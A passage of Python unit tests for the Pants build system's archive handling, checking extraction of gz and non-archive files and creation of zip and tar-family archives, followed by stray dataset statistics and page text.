digest_contents = rule_runner.request(DigestContents, [extracted_archive.digest])
assert digest_contents == EXPECTED_DIGEST_CONTENTS
def test_extract_gz(rule_runner: RuleRunner) -> None:
# NB: `gz` files are only compressed, and are not archives: they represent a single file.
name = "test"
content = b"Hello world!\n"
io = BytesIO()
with gzip.GzipFile(fileobj=io, mode="w") as gzf:
gzf.write(content)
io.flush()
input_snapshot = rule_runner.make_snapshot({f"{name}.gz": io.getvalue()})
rule_runner.set_options(args=[], env_inherit={"PATH", "PYENV_ROOT", "HOME"})
extracted_archive = rule_runner.request(ExtractedArchive, [input_snapshot.digest])
digest_contents = rule_runner.request(DigestContents, [extracted_archive.digest])
assert digest_contents == DigestContents([FileContent(name, content)])
def test_extract_non_archive(rule_runner: RuleRunner) -> None:
input_snapshot = rule_runner.make_snapshot({"test.sh": b"# A shell script"})
extracted_archive = rule_runner.request(ExtractedArchive, [input_snapshot.digest])
digest_contents = rule_runner.request(DigestContents, [extracted_archive.digest])
assert DigestContents([FileContent("test.sh", b"# A shell script")]) == digest_contents
def test_create_zip_archive(rule_runner: RuleRunner) -> None:
output_filename = "demo/a.zip"
input_snapshot = rule_runner.make_snapshot(FILES)
created_digest = rule_runner.request(
Digest,
[CreateArchive(input_snapshot, output_filename=output_filename, format=ArchiveFormat.ZIP)],
)
digest_contents = rule_runner.request(DigestContents, [created_digest])
assert len(digest_contents) == 1
io = BytesIO()
io.write(digest_contents[0].content)
with zipfile.ZipFile(io) as zf:
assert set(zf.namelist()) == set(FILES.keys())
# We also use Pants to extract the created archive, which checks for idempotency.
extracted_archive = rule_runner.request(ExtractedArchive, [created_digest])
digest_contents = rule_runner.request(DigestContents, [extracted_archive.digest])
assert digest_contents == EXPECTED_DIGEST_CONTENTS
@pytest.mark.parametrize(
"format", [ArchiveFormat.TAR, ArchiveFormat.TGZ, ArchiveFormat.TXZ, ArchiveFormat.TBZ2]
)
def test_create_tar_archive(rule_runner: RuleRunner, format: ArchiveFormat) -> None:
output_filename = f"demo/a.{format.value}"
input_snapshot = rule_runner.make_snapshot(FILES)
created_digest = rule_runner.request(
Digest,
[CreateArchive(input_snapshot, output_filename=output_filename, format=format)],
)
digest_contents = rule_runner.request(DigestContents, [created_digest])
assert len(digest_contents) == 1
io = BytesIO()
io.write(digest_contents[0].content)
io.seek(0)
compression = "" if format == ArchiveFormat.TAR else f"{format.value[4:]}" # Strip `tar.`.
with tarfile.open(fileobj=io, mode=f"r:{compression}") as tf:
assert set(tf.getnames()) == set(FILES.keys())
# We also use Pants to extract the created archive, which checks for idempotency.
extracted_archive = rule_runner.request(ExtractedArchive, [created_digest])
digest_contents = rule_runner.request(DigestContents, [extracted_archive.digest])
assert digest_contents == EXPECTED_DIGEST_CONTENTS
| 41.75188
| 99
| 0.726994
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.